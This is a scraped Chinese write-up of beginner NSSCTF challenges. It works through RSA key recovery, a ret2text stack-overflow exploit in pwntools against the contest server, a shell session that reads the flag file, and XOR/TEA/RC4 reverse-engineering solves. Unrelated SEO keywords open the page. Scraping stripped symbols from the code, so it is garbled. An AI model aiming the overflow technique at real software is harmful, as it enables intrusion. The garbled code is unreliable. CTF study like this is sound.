织梦网站多少钱,广告多的网站,公司建立网站,山东省住房和城乡建设厅网站6打着玩玩#xff0c;比赛很简单。
Crypto
pr
一个RSA题#xff0c;n1p*q,n2q*r给了两个c和p,r而且flag经过pad用单因子无法解出。分别用p,r解完再取crt
from Crypto.Util.number import *
import randomflagplaintext NSSCTF{****************}
charset abcdefghijklmn…打着玩玩比赛很简单。
Crypto
pr
一个RSA题n1p*q,n2q*r给了两个c和p,r而且flag经过pad用单因子无法解出。分别用p,r解完再取crt
from Crypto.Util.number import *
import randomflagplaintext NSSCTF{****************}
charset abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
padding_length 100 - len(plaintext)for _ in range(padding_length):plaintext random.choice(charset)public_exponent 31413537523
message bytes_to_long(plaintext.encode())
assert message (1 512)
assert message (1 1024)prime_p getPrime(512)
prime_q getPrime(512)
prime_r getPrime(512)
n1 prime_p * prime_q
n2 prime_q * prime_r
ciphertext1 pow(message, public_exponent, n1)
ciphertext2 pow(message, public_exponent, n2)
print(c1, ciphertext1)
print(c2, ciphertext2)
print(p, prime_p)
print(r, prime_r)
c1 36918910341116680090654563538246204134840776220077189276689868322808977412566781872132517635399441578464309667998925236488280867210758507758915311644529399878185776345227817559234605958783077866016808605942558810445187434690812992072238407431218047312484354859724174751718700409405142819140636116559320641695
c2 15601788304485903964195122196382181273808496834343051747331984997977255326224514191280515875796224074672957848566506948553165091090701291545031857563686815297483181025074113978465751897596411324331847008870832527695258040104858667684793196948970048750296571273364559767074262996595282324974180754813257013752
p 12101696894052331138951718202838643670037274599483776996203693662637821825873973767235442427190607145999472731101517998719984942030184683388441121181962123
r 10199001137987151966640837133782537428248507382360655526592866939552984259171772190788036403425837649697437126360866173688083643144865107648483668545682383e 31413537523
m1 pow(c1, invert(e,p-1),p)
m2 pow(c2, invert(e,r-1),r)
m crt([int(m1),int(m2)],[p,r])
long_to_bytes(m)
#bNSSCTF{yUanshEnx1ncHun2o23!}FA3JmflIoai8BxgdIGUQumsNc5R0hpo53zICaiWZRfjBj59P36EwC4CSfJOsZ3LIOYnhUmsQbreak
给了私钥的一部分用0281切开后发现给的是q,...猜e0x10001直接解密即可提交要换壳。
#部分私钥
a Bc8tSTrvGJm2oYuCzIzYg4nwwKBgQDiYUawe5YrPbFhVOMVB8ZByfMa4LjeSDd
Z23jEGvylBHSeyvFCQq3ISUE40k1D2XmmeaZML3a1nUn6ORIWGaG2phcwrWLkR6n
ubVmb1QJSzgzmFHGnL56KHByZxD9q6DPBo6gGWt8/6ddBl2NIZU/1btdPQgojfA
XXJFzR92RQKBgQC7qlB0U7m2U4FdG9eelSdWSKNUVllZAuHji7jgh7Ox6La9xN5
miGZ1yvP44yX218OJ9Zi08o6vIrM6Eil45KzTtGm4iuIn8CMpox5eUtoxyvxa9r
s2WuIRZN9zCMEpqI8/TG27dIyDzsdgNqcUo8ESls7uW5/FEA7bYTCiQKBgQC7
1KybeBkZ0zlfIdi8tVOpeIuaHDbdh3/5wHUsD3hmfg7VAag0q/2RA1vkB/oG1
QVLVHl0Yu0I/1/u5jyeakrtClAegAsvlrK3i321rGS4YpTPb3SX1P/f3GZ7o7Ds
touANHk8IL9T7xkmJYw5h/RLG32ucH6aU6MXfLR5QKBgD/skfdFxGWxhHk6U1mS
27IM9jJNg9xLz5nxzkqPPhLnrdgIIuTuQtveEjEP7ZV10rg5yKVJd/bxy8H
2IN7aQo7kZWulHTQDZMFwgOhn0u6glJiqC8bWzYDFOQSFrY9XQ3vwKMspqm697
xMdMUW0LML6oUE9ZjEiAY/5from base64 import *
for i in a.split():print(b64decode(i).hex())
05cf2d493aef1899b6a18b82cc8cfe620e27c302818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd
676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7
b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c0
5d7245cd1f764502818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf71379
9a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6b
b365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c28902818100bb
d4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b5
4152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ec
b68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e50281803fec91f745c465b184793a535992
dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07
d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7b
c4cf9d3145b42cc2faa1413d663122018ff9
#q,dp,dq,crt:(q-1)%p
02818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
02818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf713799a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6bb365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c289
02818100bbd4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b54152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ecb68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e5
0281803fec91f745c465b184793a535992dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7bc4cf9d3145b42cc2faa1413d663122018ff9q 0x00e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
c 6081370370545409218106271903400346695565292992689150366474451604281551878507114813906275593034729563149286993189430514737137534129570304832172520820901940874698337733991868650159489601159238582002010625666203730677577976307606665760650563172302688129824842780090723167480409842707790983962415315804311334507726664838464859751689906850572044873633896253285381878416855505301919877714965930289139921111644393144686543207867970807469735534838601255712764863973853116693691206791007433101433703535127367245739289103650669095061417223994665200039533840922696282929063608853551346533188464573323230476645532002621795338655
e 0x10001
m pow(c, invert(e, q-1),q)
long_to_bytes(m)
#bflag{oi!_you_find___what_i_Wa1t_talK_y0n!!!}
#NSSCTF{oi!_you_find___what_i_Wa1t_talK_y0n!!!}
PWN
nc_pwnre
nc后给出汇编和密文加密很简单就是个异或把结果base64解码后提交就进入shell
┌──(kali㉿kali)-[~/ctf/1223]
└─$ nc node7.anna.nssctf.cn 28164
pwn? re?no no no,this is just an easy nc-test.loc_40116D:
mov eax, [ebpi]
add eax, 1
mov [ebpi], eax
loc_401176:
mov ecx, [ebpStr]
push ecx
call _strlen
add esp, 4
cmp [ebpi], eax
jge short loc_40119D
mov edx, [ebpStr]
add edx, [ebpi]
movsx eax, byte ptr [edx]
xor eax, 10h
mov ecx, [ebpStr]
add ecx, [ebpi]
mov [ecx], al
jmp short loc_40116D
maybe the result is talking about xor?
My result:
0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2dyour answer?
NSSCTF{WELc0M_T0_pWn_w0r1d!}
You got it! Try to find the real flag!!!
ls
attachment
bin
dev
flag
lib
lib32
lib64
libx32
cat flag
NSSCTF{722dac10-45f0-4604-93cb-d196b71d7f30}
ret_text
名字就可以看出来是直接溢出到后门。这里有个判断v20 并且 -v20 就用-0x80000000绕过即可。
from pwn import *#p process(./ret_text_v0)
p remote(node1.anna.nssctf.cn, 28406)
context(archi386, log_leveldebug)p.sendlineafter(bEasy ret2text!!!Input:\n, b-2147483648)
p.sendafter(bOK!!!You are right.\n, b\x00*0x24 p32(0x8049328))p.interactive()
Reverse
debugger
就是动调把exit(0) nop掉后打个断点运行到这就看着flag了 a 347B46544353534E
2D37376132356434
3331342D61653239
662D346338392D65
3364663634383566
7D643738
b.join([bytes.fromhex(i)[::-1] for i in a.split()])
bNSSCTF{44d52a77-92ea-413e-98c4-ff5846fd387d} CompileMe!
给了个c的代码让编译。有环境估计直接整就行完成的人不多说明window上安环境的人真不多。我也没有不过程序比较简单一眼RC4后边是个加减异或的加密共XXXXXX次先把这块异出来写成函数。
lines open(Program.cs,rb).readlines()a bdef ccc(val):\n
for line in lines:if line.startswith(b return val):a b val line[18:]print(a)
open(c.py,wb).write(a)
然后在RC4解密原来的程序就是解密程序直接翻译成python后调用ccc
from ctypes import *
from pwn import p64
from c import cccdef decrypt(v,key):v0 c_uint64(v[0])v1 c_uint64(v[1])delta 0x9E3779B9sum1 c_uint64((delta) * 32)for i in range(32): v1.value - (((v0.value 4) ^ (v0.value 5)) v0.value) ^ (sum1.value key[(sum1.value 11) 3])sum1.value - delta v0.value - (((v1.value 4) ^ (v1.value 5)) v1.value) ^ (sum1.value key[sum1.value 3])return p64(ccc(v0.value)0xffffffffffffffff)[::-1]p64(ccc(v1.value)0xffffffffffffffff)[::-1]enc [0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9]
key [0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963]flag b
for i in range(0,8,2):flag decrypt(enc[i:i2],key)print(flag)
#NSSCTF{58MtU4iTx4uKu8PVHEYyY9a7tZ0daqVIfJVV9kpMRZ7uvDGYHRuJ58Mz}
v7 - (((v8 4) ^ (v8 5)) v8) ^ (v4 v16[(v4 11) 3]);
v4 - v14;
v8 - (((v7 4) ^ (v7 5)) v7) ^ (v4 v16[v4 3]);
